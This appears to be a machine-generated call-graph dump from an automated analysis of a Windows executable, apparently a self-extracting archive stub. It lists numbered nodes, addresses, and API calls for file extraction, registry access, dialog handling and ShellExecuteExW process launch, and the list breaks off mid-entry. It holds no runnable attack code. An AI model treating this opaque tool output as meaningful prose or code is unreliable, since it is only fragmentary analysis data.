22273->22139 22275 42318f 22274->22275 22276 41e49d __encode_pointer 6 API calls 22275->22276 22277 4231a7 22275->22277 22276->22275 22277->21680 22279 410bf7 GetProcAddress 22278->22279 22280 40fd0b OleInitialize 22278->22280 22279->22280 22281 410c07 22279->22281 22282 411cc7 GetCPInfo 22280->22282 22281->22280 22283 411ceb IsDBCSLeadByte 22282->22283 22283->22283 22284 411d03 22283->22284 22284->21693 22285->21700 22308 40bae4 22286->22308 22288 40c266 22331 40bfa8 GetModuleHandleW FindResourceW 22288->22331 22290 40c26d 22290->21709 22292 419e42 22291->22292 22293 419e3f FreeLibrary 22291->22293 22294 419e49 FreeLibrary 22292->22294 22295 419e4c OleUninitialize 22292->22295 22293->22292 22294->22295 22303 40d51f 22297->22303 22298 40d62a 22298->21701 22298->21702 22299 40d554 CharUpperW 22299->22303 22300 40d5db CharUpperW 22300->22303 22301 40d57b CharUpperW 22301->22303 22302 40cee5 124 API calls 22302->22303 22303->22298 22303->22299 22303->22300 22303->22301 22303->22302 22306 40d4d6 22304->22306 22305 40d4f5 22305->21707 22306->22305 22307 40d4ed SetEnvironmentVariableW 22306->22307 22307->22305 22309 40baee __EH_prolog _wcschr __write_nolock 22308->22309 22310 40bb11 GetModuleFileNameW 22309->22310 22312 40bb3a _wcscpy 22309->22312 22311 40bb2d _wcsrchr 22310->22311 22311->22312 22330 40bb6e ctype 22311->22330 22313 4086e3 6 API calls 22312->22313 22324 40bb6a ctype _strncmp 22313->22324 22314 40bca4 22314->22330 22335 408f0d 22314->22335 22315 408ace 122 API calls 22315->22324 22318 41ccee _malloc 67 API calls 22320 40bcca 22318->22320 22319 408d9b 125 API calls 22319->22324 22321 408d9b 125 API calls 22320->22321 22320->22330 22323 40bce6 22321->22323 22322 408f0d 124 API calls 22322->22324 22325 41ccee _malloc 67 API calls 22323->22325 22323->22330 22324->22314 22324->22315 22324->22319 22324->22322 22324->22330 22326 40bd00 22325->22326 22327 4118ad MultiByteToWideChar 22326->22327 22326->22330 22328 40bd21 22327->22328 22329 41a27a _realloc 67 API calls 22328->22329 22329->22330 22330->22288 22332 40bfd6 22331->22332 22334 40bfd0 22331->22334 22333 40bdcf ctype 102 API calls 22332->22333 22333->22334 22334->22290 22336 408e6b 124 API calls 22335->22336 22337 408f21 22336->22337 22338 408f38 22337->22338 22339 40638c 120 API calls 22337->22339 22338->22318 22339->22338 23647 41e77e 23649 41e78a __close 23647->23649 23648 41e7a2 23652 41e7b0 23648->23652 23654 41a27a _realloc 67 API calls 23648->23654 23649->23648 23650 41e88c __close 23649->23650 23651 41a27a _realloc 67 API calls 23649->23651 23651->23648 23653 41e7be 23652->23653 23655 41a27a _realloc 67 API calls 23652->23655 23656 41a27a _realloc 67 API calls 23653->23656 23657 41e7cc 23653->23657 23654->23652 23655->23653 23656->23657 23658 41e7da 23657->23658 23659 41a27a _realloc 67 API calls 23657->23659 23660 41e7e8 23658->23660 23662 41a27a _realloc 67 API calls 23658->23662 23659->23658 23661 41e7f6 23660->23661 23663 41a27a _realloc 67 API calls 23660->23663 23664 41e807 23661->23664 23665 41a27a _realloc 67 API calls 23661->23665 23662->23660 23663->23661 23666 41ed53 __lock 67 API calls 23664->23666 23665->23664 23667 41e80f 23666->23667 23668 41e834 23667->23668 23669 41e81b InterlockedDecrement 23667->23669 23683 41e898 23668->23683 23669->23668 23671 41e826 23669->23671 23671->23668 23674 41a27a _realloc 67 API calls 23671->23674 23673 41ed53 __lock 67 API calls 23675 41e848 23673->23675 23674->23668 23676 41e879 23675->23676 23677 421fec ___removelocaleref 8 API calls 23675->23677 23686 41e8a4 23676->23686 23681 41e85d 23677->23681 23680 41a27a _realloc 67 API calls 23680->23650 23681->23676 23682 421e14 ___freetlocinfo 67 API calls 23681->23682 23682->23676 23689 41ec79 LeaveCriticalSection 23683->23689 23685 41e841 23685->23673 23690 41ec79 LeaveCriticalSection 23686->23690 23688 41e886 23688->23680 23689->23685 23690->23688 24027 41c58b 24030 41c57b 24027->24030 24029 41c598 ctype 24033 420c83 24030->24033 24032 41c589 24032->24029 24034 420c8f __close 24033->24034 24035 41ed53 __lock 67 API calls 24034->24035 24039 420c96 24035->24039 24036 420ccf 24043 420cea 24036->24043 24038 420ce0 __close 24038->24032 24039->24036 24040 420cc6 24039->24040 24042 41a27a _realloc 67 API calls 24039->24042 24041 41a27a _realloc 67 API calls 24040->24041 24041->24036 24042->24040 24046 41ec79 LeaveCriticalSection 24043->24046 24045 420cf1 24045->24038 24046->24045 22675 40dcaf 22676 40dcbc __write_nolock 22675->22676 22677 40c271 ctype 104 API calls 22676->22677 22678 40dcd0 22677->22678 22679 401b74 _swprintf 101 API calls 22678->22679 22680 40dce2 SetDlgItemTextW 22679->22680 22683 40cfc8 PeekMessageW 22680->22683 22684 40cfe3 GetMessageW TranslateMessage DispatchMessageW 22683->22684 22685 40d004 22683->22685 22684->22685 19289 40f436 19290 40f440 __EH_prolog __write_nolock 19289->19290 19450 4060e6 19290->19450 19293 40f482 19295 40f46b 19293->19295 19298 40f4f1 GetDlgItemTextW 19293->19298 19299 40f48c 19293->19299 19294 40fa19 19296 40fa3d 19294->19296 19297 40fa2e SendMessageW 19294->19297 19300 40fa56 19296->19300 19301 40fa46 SendDlgItemMessageW 19296->19301 19297->19296 19303 40f525 19298->19303 19304 40f4cd 19298->19304 19299->19304 19305 40f48f 19299->19305 19529 40da71 19300->19529 19301->19300 19307 40f53c GetDlgItem 19303->19307 19448 40f52d 19303->19448 19304->19295 19309 40f8c8 EndDialog 19304->19309 19305->19295 19312 40c271 ctype 104 API calls 19305->19312 19310 40f550 SendMessageW SendMessageW 19307->19310 19311 40f576 SetFocus 19307->19311 19309->19295 19310->19311 19315 40f587 19311->19315 19328 40f593 19311->19328 19316 40f4a9 19312->19316 19313 40fbb2 KiUserCallbackDispatcher 19313->19295 19314 40fa8d GetDlgItem 19320 40faa3 19314->19320 19321 40faa9 SetWindowTextW 19314->19321 19317 40c271 ctype 104 API calls 19315->19317 19571 4050e0 SHGetMalloc 19316->19571 19322 40f591 19317->19322 19319 40f9bc 19324 40c271 ctype 104 API calls 19319->19324 19320->19321 19549 419a27 GetClassNameW 19321->19549 19456 40d148 GetDlgItem 19322->19456 19327 40f9cd SetDlgItemTextW 19324->19327 19326 40f4b8 SetDlgItemTextW 19326->19295 19330 40f9e0 19327->19330 19333 40c271 ctype 104 API calls 19328->19333 19336 40c271 ctype 104 API calls 19330->19336 19337 40f5c5 19333->19337 19335 40f5e7 19339 40f5fb 19335->19339 19575 40d93c 19335->19575 19341 40fa05 19336->19341 19342 401b74 _swprintf 101 API calls 19337->19342 19338 40faec 19347 40c271 ctype 104 API calls 19338->19347 19350 40fb20 19338->19350 19465 40927f 19339->19465 19346 40c271 ctype 104 API calls 19341->19346 19342->19322 19343 40e700 154 API calls 19343->19338 19351 40fa0c MessageBoxW 19346->19351 19348 40fafe SetDlgItemTextW 19347->19348 19352 40c271 ctype 104 API calls 19348->19352 19349 40f60f GetLastError 19353 40f61a 19349->19353 19354 40e700 154 API calls 19350->19354 19396 40fbcc _wcscat 19350->19396 19351->19295 19357 40fb12 SetDlgItemTextW 19352->19357 19471 4199fd SetCurrentDirectoryW 19353->19471 19358 40fb3c 19354->19358 19356 40fc75 19360 40fc88 19356->19360 19361 40fc7e EnableWindow 19356->19361 19357->19350 19362 40fb70 19358->19362 19367 40fb4d 19358->19367 19359 40f62f 19363 40f641 19359->19363 19364 40f636 GetLastError 19359->19364 19365 40fca2 19360->19365 19603 4060a3 GetDlgItem KiUserCallbackDispatcher 19360->19603 19361->19360 19369 40fb78 SetForegroundWindow 19362->19369 19370 40fbbf 19362->19370 19374 40f6be 19363->19374 19376 40f652 GetTickCount 19363->19376 19421 40f6a2 ctype 19363->19421 19364->19363 19366 40fccd 19365->19366 19379 40fcc7 PostMessageW 19365->19379 19380 40fcbf SendMessageW 19365->19380 19366->19295 19381 40c271 ctype 104 API calls 19366->19381 19588 419812 ShowWindow 19367->19588 19369->19370 19371 40fb87 19369->19371 19372 40e700 154 API calls 19370->19372 19371->19370 19378 40fb8f DialogBoxParamW 19371->19378 19372->19396 19373 40f8d7 19483 4060c1 GetDlgItem ShowWindow 19373->19483 19384 40f6d9 GetModuleFileNameW 19374->19384 19385 40f86f 19374->19385 19472 401b74 19376->19472 19377 40fc99 19604 4060a3 GetDlgItem KiUserCallbackDispatcher 19377->19604 19378->19370 19392 40fbab 19378->19392 19379->19366 19380->19366 19393 40fcdf SetDlgItemTextW 19381->19393 19581 40ceac 19384->19581 19394 40c271 ctype 104 API calls 19385->19394 19388 40fc55 19397 419812 89 API calls 19388->19397 19389 40f8e9 19484 4060c1 GetDlgItem ShowWindow 19389->19484 19390 41a27a _realloc 67 API calls 19400 40fb6f 19390->19400 19391 40f66b 19475 408843 19391->19475 19392->19313 19393->19295 19399 40f879 19394->19399 19396->19356 19396->19388 19402 40c271 ctype 104 API calls 19396->19402 19403 40fc72 19397->19403 19405 401b74 _swprintf 101 API calls 19399->19405 19400->19362 19402->19396 19403->19356 19404 40f8f2 19485 4060a3 GetDlgItem KiUserCallbackDispatcher 19404->19485 19410 40f897 19405->19410 19406 401b74 _swprintf 101 API calls 19407 40f72b CreateFileMappingW 19406->19407 19411 40f78a GetCommandLineW 19407->19411 19412 40f7ee ShellExecuteExW 19407->19412 19418 40c271 ctype 104 API calls 19410->19418 19415 40f79a 19411->19415 19427 40f80b ctype 19412->19427 19413 40f8fa 19486 4060c1 GetDlgItem ShowWindow 19413->19486 19414 40f690 19416 40f697 GetLastError 19414->19416 19414->19421 19585 40d0c2 SHGetMalloc SHGetSpecialFolderLocation SHGetPathFromIDListW 19415->19585 19416->19421 19422 40f8b2 MessageBoxW 19418->19422 19420 40f903 SetDlgItemTextW GetDlgItem 19424 40f921 GetWindowLongW SetWindowLongW 19420->19424 19425 40f93b 19420->19425 19421->19373 19421->19374 19422->19304 19424->19425 19487 40e700 19425->19487 19426 40d0c2 3 API calls 19432 40f7c2 19426->19432 19429 40f820 WaitForInputIdle 19427->19429 19430 40f845 19427->19430 19434 40f830 19429->19434 19438 40f858 UnmapViewOfFile CloseHandle 19430->19438 19439 40f86a 19430->19439 19433 40d0c2 3 API calls 19432->19433 19440 40f7ce MapViewOfFile 19433->19440 19434->19430 19436 40f837 Sleep 19434->19436 19435 40e700 154 API calls 19437 40f957 19435->19437 19436->19430 19436->19434 19517 40e187 19437->19517 19438->19439 19439->19304 19439->19385 19441 40f7eb _realloc 19440->19441 19441->19412 19444 40e700 154 API calls 19447 40f970 19444->19447 19445 40f996 19587 4060a3 GetDlgItem KiUserCallbackDispatcher 19445->19587 19447->19445 19449 40e700 154 API calls 19447->19449 19448->19313 19448->19319 19449->19445 19451 406113 19450->19451 19452 4060ef 19450->19452 19625 40babd 19451->19625 19454 406111 19452->19454 19605 40c00e 19452->19605 19454->19293 19454->19294 19454->19295 19457 40d178 19456->19457 19458 40d1aa SendMessageW SendMessageW 19456->19458 19641 418f00 19457->19641 19459 40d1fa SendMessageW SendMessageW SendMessageW 19458->19459 19460 40d1de 19458->19460 19462 40d244 SendMessageW 19459->19462 19463 40d226 SendMessageW 19459->19463 19460->19459 19462->19335 19463->19462 19467 40928c __write_nolock _wcsncpy 19465->19467 19466 40931b 19468 4091e9 9 API calls 19466->19468 19470 40933e 19466->19470 19467->19466 19467->19470 19644 4091e9 19467->19644 19468->19470 19470->19349 19470->19353 19471->19359 19473 41a767 __vswprintf_c_l 101 API calls 19472->19473 19474 401b8c 19473->19474 19474->19391 19476 408850 __write_nolock 19475->19476 19477 4088b1 19476->19477 19478 4088b7 CreateFileW 19476->19478 19479 4088ff 19477->19479 19480 40a77b 2 API calls 19477->19480 19478->19477 19479->19414 19481 4088e4 19480->19481 19481->19479 19482 4088e8 CreateFileW 19481->19482 19482->19479 19483->19389 19484->19404 19485->19413 19486->19420 19488 40e70a __EH_prolog __write_nolock 19487->19488 19489 40f2da 19488->19489 19698 40d631 19488->19698 19489->19435 19492 40d631 ExpandEnvironmentStringsW 19503 40e73f _wcscat _wcslen _wcsrchr _wcscpy 19492->19503 19493 40ea5b SetWindowTextW 19493->19503 19496 40eaf9 RegOpenKeyExW 19498 40eb15 RegQueryValueExW RegCloseKey 19496->19498 19496->19503 19497 41a308 _realloc 72 API calls 19497->19503 19498->19503 19500 41a27a _realloc 67 API calls 19500->19503 19501 40e847 SetFileAttributesW 19504 40e905 GetFileAttributesW 19501->19504 19510 40e842 _memset _wcslen 19501->19510 19503->19489 19503->19492 19503->19493 19503->19496 19503->19497 19503->19500 19503->19510 19514 40ec50 SendMessageW 19503->19514 19702 411bd1 CompareStringW 19503->19702 19703 40d9c6 19503->19703 19710 419a10 GetCurrentDirectoryW 19503->19710 19711 40952e 19503->19711 19720 409369 19503->19720 19723 40d7dd 19503->19723 19506 40e913 DeleteFileW 19504->19506 19504->19510 19506->19510 19508 40952e 7 API calls 19508->19510 19510->19501 19510->19503 19510->19508 19511 401b74 _swprintf 101 API calls 19510->19511 19516 40e8e1 SHFileOperationW 19510->19516 19715 40a6ec 19510->19715 19512 40e945 GetFileAttributesW 19511->19512 19512->19510 19513 40e956 MoveFileW 19512->19513 19513->19510 19515 40e96e MoveFileExW 19513->19515 19514->19503 19515->19510 19516->19504 19518 40e191 _wcscpy __EH_prolog __write_nolock 19517->19518 19746 410ac0 19518->19746 19520 40e1c2 _wcscpy 19750 405379 19520->19750 19522 40e1e0 19754 407096 19522->19754 19526 40e22c 19769 406fba 19526->19769 19530 40da7e __write_nolock 19529->19530 21371 419bcb 19530->21371 19533 40db61 GetDlgItem SendMessageW 19548 419a10 GetCurrentDirectoryW 19533->19548 19534 40da8b GetWindow 19534->19533 19535 40daa8 19534->19535 19535->19533 19536 40dabd GetClassNameW 19535->19536 19538 40dae5 GetWindowLongW 19535->19538 19539 40db46 GetWindow 19535->19539 21376 411bd1 CompareStringW 19536->21376 19538->19539 19540 40daf5 SendMessageW 19538->19540 19539->19533 19539->19535 19540->19539 19541 40db07 GetObjectW 19540->19541 21377 419b88 19541->21377 19543 40db1c 21381 419b45 19543->21381 21385 419c15 19543->21385 19547 40db3f DeleteObject 19547->19539 19548->19314 19550 419a48 19549->19550 19555 419a6d 19549->19555 21402 411bd1 CompareStringW 19550->21402 19551 419a72 SHAutoComplete 19552 40fabb 19551->19552 19557 40e608 19552->19557 19554 419a5b 19554->19555 19556 419a5f FindWindowExW 19554->19556 19555->19551 19555->19552 19556->19555 19558 40e612 __EH_prolog __write_nolock 19557->19558 19559 40184a 133 API calls 19558->19559 19560 40e634 19559->19560 21403 401a42 19560->21403 19565 40e6ad 19568 401228 ctype 131 API calls 19565->19568 19566 41ccee _malloc 67 API calls 19569 40e67a _realloc 19566->19569 19567 41a27a _realloc 67 API calls 19567->19565 19570 40e6bc 19568->19570 19569->19565 19569->19567 19570->19338 19570->19343 19572 4050fb SHBrowseForFolderW 19571->19572 19573 4050f7 19571->19573 19572->19573 19574 405138 SHGetPathFromIDListW 19572->19574 19573->19295 19573->19326 19574->19573 19577 40d949 __write_nolock 19575->19577 19576 40d9c1 19576->19339 19577->19576 19578 40d96e RegCreateKeyExW 19577->19578 19578->19576 19579 40d994 _wcslen 19578->19579 19580 40d99c RegSetValueExW RegCloseKey 19579->19580 19580->19576 19582 40ceb5 19581->19582 19583 40cece 19581->19583 19584 40ce6b 124 API calls 19582->19584 19583->19406 19584->19583 19586 40d0f8 19585->19586 19586->19426 19587->19448 21451 4197ab LoadCursorW RegisterClassExW 19588->21451 19590 41983c GetWindowRect GetParent MapWindowPoints 19591 419872 DestroyWindow 19590->19591 19592 419879 GetParent CreateWindowExW 19590->19592 19591->19592 19593 4198fb 19592->19593 19595 4198be 19592->19595 19594 4198ff ShowWindow UpdateWindow 19593->19594 19596 419911 19593->19596 19594->19596 19602 40fb64 19595->19602 21452 4191f2 19595->21452 19596->19602 21458 419045 GetTickCount GetTickCount 19596->21458 19600 4198dd ShowWindow SetWindowTextW 19601 41a27a _realloc 67 API calls 19600->19601 19601->19602 19602->19390 19603->19377 19604->19365 19628 40bf27 19605->19628 19607 40c02d GetWindowRect GetClientRect 19608 40c10a 19607->19608 19612 40c071 19607->19612 19610 40c153 GetSystemMetrics GetWindow 19608->19610 19611 40c115 GetWindowTextW 19608->19611 19609 40c14e 19609->19610 19620 40c177 19610->19620 19631 40bdcf 19611->19631 19612->19609 19614 40c0c4 GetWindowLongW 19612->19614 19618 40c0e4 SetWindowPos GetWindowRect 19614->19618 19619 40c0dd 19614->19619 19615 40c253 19615->19454 19616 40c13c SetWindowTextW 19616->19610 19617 40c184 GetWindowTextW 19617->19620 19618->19608 19619->19618 19620->19615 19620->19617 19621 40bdcf ctype 102 API calls 19620->19621 19622 40c235 GetWindow 19620->19622 19623 40c1cb GetWindowRect SetWindowPos 19620->19623 19624 40c1b5 SetWindowTextW 19621->19624 19622->19615 19622->19620 19623->19622 19624->19620 19626 40bae1 19625->19626 19627 40bac3 GetWindowLongW SetWindowLongW 19625->19627 19626->19454 19627->19626 19629 40bdcf ctype 102 API calls 19628->19629 19630 40bf4e _wcschr 19629->19630 19630->19607 19632 40bddc ctype __write_nolock 19631->19632 19633 40be37 ctype _strlen 19632->19633 19638 40be96 _wcsrchr _wcscpy _wcschr ctype _wcsncpy 19632->19638 19639 41186e WideCharToMultiByte 19632->19639 19634 41186e ctype WideCharToMultiByte 19633->19634 19636 40be64 ctype _strlen 19634->19636 19637 401b74 _swprintf 101 API calls 19636->19637 19637->19638 19638->19616 19640 411898 19639->19640 19640->19633 19642 40d183 ShowWindow SendMessageW SendMessageW 19641->19642 19643 418f0a DestroyWindow 19641->19643 19642->19458 19643->19642 19645 4091f6 __write_nolock 19644->19645 19646 40921f 19645->19646 19647 409216 CreateDirectoryW 19645->19647 19657 4091c5 19646->19657 19647->19646 19650 40924e 19647->19650 19654 40925d 19650->19654 19670 408fad 19650->19670 19651 409261 GetLastError 19651->19654 19654->19467 19655 40923b 19655->19651 19656 40923f CreateDirectoryW 19655->19656 19656->19650 19656->19651 19678 408f61 19657->19678 19660 40a77b 19661 40a788 __write_nolock 19660->19661 19669 40a792 _wcslen _wcscpy _wcsncpy 19661->19669 19688 40a1e9 19661->19688 19663 40a7a1 _wcslen 19691 40a690 19663->19691 19665 40a7b0 19666 40a843 GetCurrentDirectoryW 19665->19666 19667 40a7b8 19665->19667 19666->19669 19668 40a1e9 CharUpperW 19667->19668 19668->19669 19669->19655 19671 41a860 __write_nolock 19670->19671 19672 408fba SetFileAttributesW 19671->19672 19673 408fd3 19672->19673 19674 408ffc 19672->19674 19675 40a77b 2 API calls 19673->19675 19674->19654 19676 408fe7 19675->19676 19676->19674 19677 408feb SetFileAttributesW 19676->19677 19677->19674 19686 41a860 19678->19686 19681 408f82 19683 40a77b 2 API calls 19681->19683 19682 408fa5 19682->19651 19682->19660 19684 408f96 19683->19684 19684->19682 19685 408f9a GetFileAttributesW 19684->19685 19685->19682 19687 408f6e GetFileAttributesW 19686->19687 19687->19681 19687->19682 19695 410907 19688->19695 19692 40a69b 19691->19692 19693 40a1e9 CharUpperW 19692->19693 19694 40a6a8 19692->19694 19693->19694 19694->19665 19696 410914 CharUpperW 19695->19696 19697 40a1f7 19695->19697 19696->19697 19697->19663 19699 40d63e __write_nolock 19698->19699 19700 40d6f5 19699->19700 19701 40d6d2 ExpandEnvironmentStringsW 19699->19701 19700->19503 19701->19700 19702->19503 19705 40d9d3 __write_nolock 19703->19705 19704 40da6d GetDlgItem SetWindowTextW SendMessageW 19704->19503 19705->19704 19706 40d9ef RegOpenKeyExW 19705->19706 19706->19704 19707 40da0c RegQueryValueExW 19706->19707 19708 40da64 RegCloseKey 19707->19708 19709 40da38 19707->19709 19708->19704 19709->19708 19710->19503 19713 40953f 19711->19713 19712 409396 7 API calls 19712->19713 19713->19712 19714 4095cf 19713->19714 19714->19503 19716 40a1e9 CharUpperW 19715->19716 19717 40a701 19716->19717 19718 401b74 _swprintf 101 API calls 19717->19718 19719 40a718 _wcslen _wcschr _wcsncpy 19717->19719 19718->19719 19719->19510 19721 409374 FindClose 19720->19721 19722 40937b 19720->19722 19721->19722 19722->19503 19724 40d7ea __write_nolock 19723->19724 19725 41ccee _malloc 67 API calls 19724->19725 19726 40d7f6 19725->19726 19730 40d807 _wcscat _wcslen _wcscpy 19726->19730 19731 406358 19726->19731 19728 40d631 ExpandEnvironmentStringsW 19728->19730 19729 40d8a7 19729->19503 19730->19728 19730->19729 19736 40633e 19731->19736 19733 406360 19739 4062f5 19733->19739 19743 401ba7 19736->19743 19738 406348 19738->19733 19741 406304 19739->19741 19740 406321 19740->19730 19741->19740 19742 41c52f __CxxThrowException@8 RaiseException 19741->19742 19742->19740 19744 41147f ctype 119 API calls 19743->19744 19745 401bc3 19744->19745 19745->19738 19747 410acd _wcslen 19746->19747 19775 4011a7 19747->19775 19749 410ae5 _wcscpy 19749->19520 19751 410ac0 _wcslen 19750->19751 19752 4011a7 125 API calls 19751->19752 19753 410ae5 _wcscpy 19752->19753 19753->19522 19755 4070a0 __EH_prolog 19754->19755 19785 41a60a 19755->19785 19759 4070f7 19760 4082e0 19759->19760 19761 4082ed __write_nolock 19760->19761 19762 408354 19761->19762 19884 4095dc 19761->19884 19766 4083b9 19762->19766 19767 4095dc 8 API calls 19762->19767 19861 40812b 19762->19861 19764 4083fd 19764->19526 19766->19764 19768 4012d0 ctype 119 API calls 19766->19768 19767->19762 19768->19764 19770 406fc4 __EH_prolog 19769->19770 19771 406fe1 ctype 19770->19771 19773 415380 131 API calls 19770->19773 19772 401001 ctype 131 API calls 19771->19772 19774 406ff4 19772->19774 19773->19771 19774->19444 19776 401211 19775->19776 19777 4011b9 19775->19777 19776->19749 19778 4011e2 19777->19778 19780 4063ad ctype 119 API calls 19777->19780 19779 41a308 _realloc 72 API calls 19778->19779 19783 401202 19779->19783 19781 4011d8 19780->19781 19782 406358 120 API calls 19781->19782 19782->19778 19783->19776 19784 406358 120 API calls 19783->19784 19784->19776 19787 41a614 19785->19787 19786 41ccee _malloc 67 API calls 19786->19787 19787->19786 19788 4070e3 19787->19788 19789 41fa4b __calloc_impl 6 API calls 19787->19789 19792 41a630 19787->19792 19788->19759 19797 4173ff 19788->19797 19789->19787 19790 41a656 19803 41236b 19790->19803 19792->19790 19794 41c77f __cinit 74 API calls 19792->19794 19794->19790 19795 41c52f __CxxThrowException@8 RaiseException 19796 41a66e 19795->19796 19798 417409 __EH_prolog 19797->19798 19812 410e3e 19798->19812 19800 4174e0 19821 41555c 19800->19821 19806 41d4d8 19803->19806 19807 412377 19806->19807 19808 41d4f8 _strlen 19806->19808 19807->19795 19808->19807 19809 41ccee _malloc 67 API calls 19808->19809 19810 41d50b 19809->19810 19810->19807 19811 422646 _strcpy_s 67 API calls 19810->19811 19811->19807 19827 41a250 19812->19827 19814 410e48 EnterCriticalSection 19815 410e65 19814->19815 19816 410e8a LeaveCriticalSection 19814->19816 19817 41a60a 75 API calls 19815->19817 19816->19800 19818 410e6f 19817->19818 19819 410e85 19818->19819 19828 410cf5 19818->19828 19819->19816 19822 4155c0 _memset 19821->19822 19823 415569 _memset 19821->19823 19836 4154b3 19822->19836 19826 41275c 67 API calls 19823->19826 19826->19822 19827->19814 19830 410d07 InitializeCriticalSection CreateSemaphoreW CreateEventW 19828->19830 19831 410d5e 19830->19831 19832 410d7d 19831->19832 19833 4063ad ctype 119 API calls 19831->19833 19832->19819 19834 410d72 19833->19834 19835 406353 ctype RaiseException 19834->19835 19835->19832 19837 4154f1 19836->19837 19838 4154bf _memset 19836->19838 19837->19759 19840 41505b 19838->19840 19841 41275c 67 API calls 19840->19841 19842 41506a 19841->19842 19843 415098 19842->19843 19849 414cf2 19842->19849 19844 41275c 67 API calls 19843->19844 19846 4150a3 19844->19846 19847 4150ca 19846->19847 19848 414cf2 67 API calls 19846->19848 19848->19846 19852 413bf4 19849->19852 19857 41293b 19852->19857 19855 41293b ctype 67 API calls 19858 412941 19857->19858 19859 412947 19857->19859 19860 41a27a _realloc 67 API calls 19858->19860 19859->19855 19860->19859 19862 408135 __EH_prolog __write_nolock 19861->19862 19890 40184a 19862->19890 19864 408152 19896 40881d 19864->19896 19873 40818d 20033 401228 19873->20033 19885 4095f1 19884->19885 19889 4095f5 19885->19889 21359 409396 19885->21359 19887 409605 19888 40960a FindClose 19887->19888 19887->19889 19888->19889 19889->19761 19891 401854 __EH_prolog 19890->19891 19892 41a60a 75 API calls 19891->19892 19894 4018df _memset 19891->19894 19893 4018cc 19892->19893 19893->19894 19895 409f46 126 API calls 19893->19895 19894->19864 19895->19894 19897 408828 19896->19897 19898 408169 19897->19898 20043 40649a 19897->20043 19898->19873 19900 401440 19898->19900 19901 40144a __EH_prolog 19900->19901 20052 408d9b 19901->20052 19902 40146d 20035 401232 __EH_prolog 20033->20035 20034 401261 ctype 20036 41293b ctype 67 API calls 20034->20036 20035->20034 21352 409f1c 20035->21352 20038 401274 20036->20038 20046 4063e3 20043->20046 20045 4064a5 20045->19898 20049 401c43 20046->20049 20048 4063f5 20048->20045 20050 41147f ctype 119 API calls 20049->20050 20051 401c6e 20050->20051 20051->20048 20054 408db3 20052->20054 20055 408e15 20054->20055 20056 408e00 20054->20056 20059 408e0b 20054->20059 20074 408bc0 20054->20074 20058 408bc0 5 API calls 20055->20058 20055->20059 20086 4064c4 20056->20086 20058->20055 20059->19902 20075 408bda ReadFile 20074->20075 20076 408bcf GetStdHandle 20074->20076 20076->20075 21353 409f2c _memset 21352->21353 21354 41293b ctype 67 API calls 21353->21354 21360 4093a3 __write_nolock 21359->21360 21361 409425 FindNextFileW 21360->21361 21362 4093bb FindFirstFileW 21360->21362 21363 409432 GetLastError 21361->21363 21364 409448 21361->21364 21365 4093d2 21362->21365 21370 409409 _clock 21362->21370 21363->21364 21364->21370 21366 40a77b 2 API calls 21365->21366 21367 4093e2 21366->21367 21368 4093e6 FindFirstFileW 21367->21368 21369 4093fe GetLastError 21367->21369 21368->21369 21368->21370 21369->21370 21370->19887 21372 419b45 3 API calls 21371->21372 21373 419bd2 21372->21373 21374 419b88 3 API calls 21373->21374 21375 40da83 21373->21375 21374->21375 21375->19533 21375->19534 21376->19535 21378 419b91 GetDC 21377->21378 21379 419bb7 21377->21379 21378->21379 21380 419ba0 GetDeviceCaps ReleaseDC 21378->21380 21379->19543 21380->21379 21382 419b74 21381->21382 21383 419b4e GetDC 21381->21383 21382->19543 21383->21382 21384 419b5d GetDeviceCaps ReleaseDC 21383->21384 21384->21382 21398 419bea GetDC GetDeviceCaps ReleaseDC 21385->21398 21387 419c20 21388 419c24 21387->21388 21389 419c37 GetObjectW 21387->21389 21399 419a80 GetDC CreateCompatibleDC CreateCompatibleDC GetObjectW 21388->21399 21391 419c5c 21389->21391 21392 419c5e CoCreateInstance 21389->21392 21391->21392 21393 40db2c SendMessageW 21392->21393 21394 419c80 _memset 21392->21394 21393->19539 21393->19547 21394->21393 21395 419cf6 CreateDIBSection 21394->21395 21395->21393 21396 419d43 21395->21396 21396->21393 21397 419d97 DeleteObject 21396->21397 21397->21393 21398->21387 21400 419ac7 21399->21400 21401 419aca 9 API calls 21399->21401 21400->21401 21401->21393 21402->19554 21404 40881d 119 API calls 21403->21404 21405 401a4e 21404->21405 21406 401a52 21405->21406 21407 401440 155 API calls 21405->21407 21412 401790 21406->21412 21408 401a5f 21407->21408 21408->21406 21409 4012d0 ctype 119 API calls 21408->21409 21410 401a6e 21409->21410 21411 408952 121 API calls 21410->21411 21411->21406 21413 40179a __EH_prolog 21412->21413 21414 40117b 122 API calls 21413->21414 21419 4017ab 21413->21419 21415 4017bb 21414->21415 21416 4017c6 21415->21416 21418 4017ec 21415->21418 21417 403697 155 API calls 21416->21417 21417->21419 21423 40375f 21418->21423 21419->19566 21419->19569 21426 403765 21423->21426 21424 403697 155 API calls 21424->21426 21425 40180a 21425->21419 21427 401313 21425->21427 21426->21424 21426->21425 21428 40131d __EH_prolog 21427->21428 21429 402c8f 193 API calls 21428->21429 21430 40133f 21429->21430 21431 401343 21430->21431 21432 401358 21430->21432 21434 41a27a _realloc 67 API calls 21431->21434 21442 401350 21431->21442 21444 4012b5 21432->21444 21434->21442 21438 4118ad MultiByteToWideChar 21439 40137c _wcslen 21438->21439 21440 4012f9 125 API calls 21439->21440 21441 4013c8 21440->21441 21441->21442 21443 41a27a _realloc 67 API calls 21441->21443 21442->21419 21443->21442 21445 401106 125 API calls 21444->21445 21446 4012bf 21445->21446 21447 4012f9 21446->21447 21448 401302 21447->21448 21449 40130b 21447->21449 21450 4011a7 125 API calls 21448->21450 21449->21438 21449->21439 21450->21449 21451->19590 21453 419203 _wcslen 21452->21453 21454 41ccee _malloc 67 API calls 21453->21454 21456 41920d 21454->21456 21455 41936a 21455->19600 21455->19602 21456->21455 21457 411bf2 CompareStringW 21456->21457 21457->21456 21461 41906a 21458->21461 21459 4190bf VariantInit 21460 4190ef 21459->21460 21460->19602 21461->21459 21462 419083 PeekMessageW 21461->21462 21463 419095 TranslateMessage DispatchMessageW GetMessageW 21462->21463 21464 4190b6 GetTickCount 21462->21464 21463->21464 21464->21461 21465 40ed38 21467 40ed3e 21465->21467 21474 40e752 _wcscat _wcslen _wcsrchr _wcscpy 21465->21474 21466 40d631 ExpandEnvironmentStringsW 21466->21474 21467->21474 21496 40e315 21467->21496 21468 40f2da 21471 40ea5b SetWindowTextW 21471->21474 21473 40d7dd 121 API calls 21473->21474 21474->21466 21474->21468 21474->21471 21474->21473 21475 40eaf9 RegOpenKeyExW 21474->21475 21476 41a308 _realloc 72 API calls 21474->21476 21478 40952e 7 API calls 21474->21478 21479 41a27a _realloc 67 API calls 21474->21479 21481 409369 